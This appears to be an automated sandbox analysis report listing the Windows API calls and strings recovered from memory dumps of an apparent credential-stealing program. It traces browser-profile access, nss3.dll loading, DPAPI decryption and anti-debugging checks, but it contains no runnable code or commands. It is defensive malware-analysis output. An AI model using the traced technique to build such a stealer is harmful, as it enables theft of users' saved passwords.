                                                            • Part of subcall function 0040F61A: std::locale::_Init.LIBCPMT ref: 0040F63D
                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004361B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog$InformationInitIos_base_dtorTimeZonestd::ios_base::_std::locale::_
                                                          • String ID: e{@$G
                                                          • API String ID: 3259846166-3907898668
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,002D2A8B,00000002,00000000,?,?,?,002D2A8B,?,00000000), ref: 002D2806
                                                          • GetLocaleInfoW.KERNEL32(?,20001004,002D2A8B,00000002,00000000,?,?,?,002D2A8B,?,00000000), ref: 002D282F
                                                          • GetACP.KERNEL32(?,?,002D2A8B,?,00000000), ref: 002D2844
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: ACP$OCP
                                                          • API String ID: 2299586839-711371036
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 002C6E7B: GetLastError.KERNEL32(?,00000000,?,002B47A1,00000000,00000000,?,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6E80
                                                            • Part of subcall function 002C6E7B: SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6F1E
                                                          • GetACP.KERNEL32(?,?,?,?,?,?,002C52B0,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 002D20A2
                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,002C52B0,?,?,?,00000055,?,-00000050,?,?), ref: 002D20CD
                                                          • _wcschr.LIBVCRUNTIME ref: 002D2161
                                                          • _wcschr.LIBVCRUNTIME ref: 002D216F
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 002D2230
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                          • String ID:
                                                          • API String ID: 4147378913-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 002C6E7B: GetLastError.KERNEL32(?,00000000,?,002B47A1,00000000,00000000,?,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6E80
                                                            • Part of subcall function 002C6E7B: SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6F1E
                                                            • Part of subcall function 002C6E7B: _free.LIBCMT ref: 002C6EDD
                                                            • Part of subcall function 002C6E7B: _free.LIBCMT ref: 002C6F13
                                                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 002D2A4E
                                                          • IsValidCodePage.KERNEL32(00000000), ref: 002D2A97
                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 002D2AA6
                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 002D2AEE
                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 002D2B0D
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                          • String ID:
                                                          • API String ID: 949163717-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0028C542
                                                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0028C56E
                                                            • Part of subcall function 002A4822: __EH_prolog.LIBCMT ref: 002A4827
                                                            • Part of subcall function 00278D2D: __EH_prolog.LIBCMT ref: 00278D32
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog$Deallocate$FolderPath
                                                          • String ID: <$Profiles
                                                          • API String ID: 638609215-1497162080
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0041C2F2
                                                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0041C31E
                                                            • Part of subcall function 004345D2: __EH_prolog.LIBCMT ref: 004345D7
                                                            • Part of subcall function 004345D2: _strcat.LIBCMT ref: 0043462F
                                                            • Part of subcall function 00408ADD: __EH_prolog.LIBCMT ref: 00408AE2
                                                            • Part of subcall function 0040EF21: _Deallocate.LIBCONCRT ref: 0040EF36
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog$Deallocate$FolderPath_strcat
                                                          • String ID: <$Profiles
                                                          • API String ID: 3344892116-1497162080
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00289F40
                                                            • Part of subcall function 002A4822: __EH_prolog.LIBCMT ref: 002A4827
                                                          • SetCurrentDirectoryA.KERNEL32(00000000,?,00000000,00000000), ref: 0028A10D
                                                            • Part of subcall function 002A4CBB: GetEnvironmentVariableA.KERNEL32(00000000,?,00000104,00000000), ref: 002A4D07
                                                            • Part of subcall function 00289D95: __EH_prolog.LIBCMT ref: 00289D9A
                                                          • LoadLibraryA.KERNEL32(00000000), ref: 0028A3F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog$CurrentDirectoryEnvironmentLibraryLoadVariable
                                                          • String ID: \nss3.dll
                                                          • API String ID: 3355849630-2210845155
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • FindClose.KERNEL32(000000FF,?,002ADF51,?,?,?,?,00278B36), ref: 002ADF2E
                                                          • FindFirstFileExW.KERNEL32(000000FF,00000001,00278B36,00000000,00000000,00000000,?,?,?,?,?,002ADF51,?,?), ref: 002ADF5E
                                                          • GetLastError.KERNEL32(?,?,002ADF51,?,?,?,?,00278B36), ref: 002ADF6B
                                                          • FindFirstFileExW.KERNEL32(000000FF,00000000,00278B36,00000000,00000000,00000000,?,?,002ADF51,?,?,?,?,00278B36), ref: 002ADF85
                                                          • GetLastError.KERNEL32(?,?,002ADF51,?,?,?,?,00278B36), ref: 002ADF92
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: Find$ErrorFileFirstLast$Close
                                                          • String ID:
                                                          • API String ID: 569926201-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: incorrect data check$incorrect header check$invalid window size$need dictionary$unknown compression method
                                                          • API String ID: 0-2151277842
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0043620D
                                                          • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,?), ref: 004362AB
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?), ref: 004362F9
                                                          • RegCloseKey.ADVAPI32(?), ref: 00436302
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CloseDeallocateH_prologOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 2130659939-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 002798A4
                                                          • wsprintfA.USER32 ref: 00279A9E
                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00279CE8
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: CryptDataH_prologUnprotectwsprintf
                                                          • String ID:
                                                          • API String ID: 2253394434-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 002C6E7B: GetLastError.KERNEL32(?,00000000,?,002B47A1,00000000,00000000,?,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6E80
                                                            • Part of subcall function 002C6E7B: SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6F1E
                                                            • Part of subcall function 002C6E7B: _free.LIBCMT ref: 002C6EDD
                                                            • Part of subcall function 002C6E7B: _free.LIBCMT ref: 002C6F13
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002D2448
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002D2492
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002D2558
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: InfoLocale$ErrorLast_free
                                                          • String ID:
                                                          • API String ID: 3140898709-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00456C2B: GetLastError.KERNEL32(?,00000000,?,00444551,00000000,00000000,?,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456C30
                                                            • Part of subcall function 00456C2B: SetLastError.KERNEL32(00000000,00000006,000000FF,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456CCE
                                                            • Part of subcall function 00456C2B: _free.LIBCMT ref: 00456C8D
                                                            • Part of subcall function 00456C2B: _free.LIBCMT ref: 00456CC3
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004621F8
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00462242
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00462308
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: InfoLocale$ErrorLast_free
                                                          • String ID:
                                                          • API String ID: 3140898709-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0028A75C
                                                          • _strlen.LIBCMT ref: 0028A7C9
                                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0028A7D1
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: BinaryCryptH_prologString_strlen
                                                          • String ID:
                                                          • API String ID: 2573900957-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0041A50C
                                                          • _strlen.LIBCMT ref: 0041A579
                                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0041A581
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: BinaryCryptH_prologString_strlen
                                                          • String ID:
                                                          • API String ID: 2573900957-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,002AE5FD), ref: 002B63A9
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002B63B3
                                                          • UnhandledExceptionFilter.KERNEL32(-00000328), ref: 002B63C0
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0043E3AD), ref: 00446159
                                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00446163
                                                          • UnhandledExceptionFilter.KERNEL32(-00000328), ref: 00446170
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(?,?,002B688C,00000000,00000000,?,00000000,?,002C0C4C), ref: 002B68AF
                                                          • TerminateProcess.KERNEL32(00000000,?,002B688C,00000000,00000000,?,00000000,?,002C0C4C), ref: 002B68B6
                                                          • ExitProcess.KERNEL32 ref: 002B68C8
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(?,?,0044663C,00000000,00000000,?,00000000,?,004509FC), ref: 0044665F
                                                          • TerminateProcess.KERNEL32(00000000,?,0044663C,00000000,00000000,?,00000000,?,004509FC), ref: 00446666
                                                          • ExitProcess.KERNEL32 ref: 00446678
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .$GetProcAddress.$l
                                                          • API String ID: 0-2784972518
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 002C6E7B: GetLastError.KERNEL32(?,00000000,?,002B47A1,00000000,00000000,?,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6E80
                                                            • Part of subcall function 002C6E7B: SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6F1E
                                                          • EnumSystemLocalesW.KERNEL32(004621A4,00000001,00000000,?,-00000050,?,002D2A22,00000000,?,?,?,00000055,?), ref: 002D2340
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                          • String ID: "*-
                                                          • API String ID: 2417226690-3996965825
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,002C5E2D,?,20001004,00000000,00000002,?,?,002C5418), ref: 002C8888
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: @
                                                          • API String ID: 2299586839-1615503679
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0027C6ED
                                                          • wsprintfA.USER32 ref: 0027C8EA
                                                            • Part of subcall function 0027F01E: __EH_prolog.LIBCMT ref: 0027F023
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                            • Part of subcall function 0027CD70: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0027CD9E
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog$DeallocateIos_base_dtorstd::ios_base::_wsprintf
                                                          • String ID:
                                                          • API String ID: 3523824839-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: DriveH_prologLogicalStrings
                                                          • String ID:
                                                          • API String ID: 3681778021-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00284425
                                                            • Part of subcall function 002A4CBB: GetEnvironmentVariableA.KERNEL32(00000000,?,00000104,00000000), ref: 002A4D07
                                                            • Part of subcall function 002A4822: __EH_prolog.LIBCMT ref: 002A4827
                                                            • Part of subcall function 00281A6B: CreateDirectoryTransactedA.KERNEL32(00000000,?,00000000,00000000), ref: 00281A98
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: DeallocateH_prolog$CreateDirectoryEnvironmentTransactedVariable
                                                          • String ID:
                                                          • API String ID: 240958575-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 004141D5
                                                            • Part of subcall function 00434A6B: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 00434AB7
                                                            • Part of subcall function 004345D2: __EH_prolog.LIBCMT ref: 004345D7
                                                            • Part of subcall function 004345D2: _strcat.LIBCMT ref: 0043462F
                                                            • Part of subcall function 0041181B: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,0000000F,00000000,?,?,00414B2E,00000000,00000000), ref: 0041182F
                                                            • Part of subcall function 0041181B: CreateDirectoryTransactedA.KERNEL32(00000000,?,00000000,00000000), ref: 00411848
                                                            • Part of subcall function 0041181B: CommitTransaction.KTMW32(00000000,?,0000000F,00000000,?,?,00414B2E,00000000,00000000), ref: 00411853
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                            • Part of subcall function 0040EF21: _Deallocate.LIBCONCRT ref: 0040EF36
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CreateDeallocateH_prologTransaction$CommitDirectoryEnvironmentTransactedVariable_strcat
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00283CD8
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                            • Part of subcall function 00281A09: CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 00281A45
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: Deallocate$CopyFileH_prologTransacted
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 002835EB
                                                            • Part of subcall function 00285B8A: _memcmp.LIBVCRUNTIME ref: 00285BAE
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                            • Part of subcall function 00281A09: CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 00281A45
                                                            • Part of subcall function 002A4822: __EH_prolog.LIBCMT ref: 002A4827
                                                            • Part of subcall function 00281A6B: CreateDirectoryTransactedA.KERNEL32(00000000,?,00000000,00000000), ref: 00281A98
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: DeallocateH_prologTransacted$CopyCreateDirectoryFile_memcmp
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,002CCC58,00000000,?,00000008,?,?,002D5D4B,00000000), ref: 002CCE8A
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ExceptionRaise
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,0045CA08,00000000,?,00000008,?,?,00465AFB,00000000), ref: 0045CC3A
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ExceptionRaise
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CoCreateInstance.OLE32(0046C8F0,00000000,00000001,0046C8C0,?), ref: 00434360
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 002C6E7B: GetLastError.KERNEL32(?,00000000,?,002B47A1,00000000,00000000,?,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6E80
                                                            • Part of subcall function 002C6E7B: SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6F1E
                                                            • Part of subcall function 002C6E7B: _free.LIBCMT ref: 002C6EDD
                                                            • Part of subcall function 002C6E7B: _free.LIBCMT ref: 002C6F13
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002D269B
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLast_free$InfoLocale
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00456C2B: GetLastError.KERNEL32(?,00000000,?,00444551,00000000,00000000,?,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456C30
                                                            • Part of subcall function 00456C2B: SetLastError.KERNEL32(00000000,00000006,000000FF,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456CCE
                                                            • Part of subcall function 00456C2B: _free.LIBCMT ref: 00456C8D
                                                            • Part of subcall function 00456C2B: _free.LIBCMT ref: 00456CC3
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0046244B
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorLast_free$InfoLocale
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00456C2B: GetLastError.KERNEL32(?,00000000,?,00444551,00000000,00000000,?,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456C30
                                                            • Part of subcall function 00456C2B: SetLastError.KERNEL32(00000000,00000006,000000FF,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456CCE
                                                          • EnumSystemLocalesW.KERNEL32(004621A4,00000001,00000000,?,-00000050,?,004627D2,00000000,?,?,?,00000055,?), ref: 004620F0
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 002C6E7B: GetLastError.KERNEL32(?,00000000,?,002B47A1,00000000,00000000,?,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6E80
                                                            • Part of subcall function 002C6E7B: SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6F1E
                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,002D2610,00000000,00000000,?), ref: 002D289F
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLast$InfoLocale
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00456C2B: GetLastError.KERNEL32(?,00000000,?,00444551,00000000,00000000,?,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456C30
                                                            • Part of subcall function 00456C2B: SetLastError.KERNEL32(00000000,00000006,000000FF,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456CCE
                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004623C0,00000000,00000000,?), ref: 0046264F
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorLast$InfoLocale
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 002C6E7B: GetLastError.KERNEL32(?,00000000,?,002B47A1,00000000,00000000,?,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6E80
                                                            • Part of subcall function 002C6E7B: SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6F1E
                                                          • EnumSystemLocalesW.KERNEL32(004623F7,00000001,009A9D6F,?,-00000050,?,002D29E6,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 002D23B3
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00456C2B: GetLastError.KERNEL32(?,00000000,?,00444551,00000000,00000000,?,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456C30
                                                            • Part of subcall function 00456C2B: SetLastError.KERNEL32(00000000,00000006,000000FF,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456CCE
                                                          • EnumSystemLocalesW.KERNEL32(004623F7,00000001,?,?,-00000050,?,00462796,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00462163
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 002C21A5: RtlEnterCriticalSection.NTDLL(-001DDF7B), ref: 002C21B4
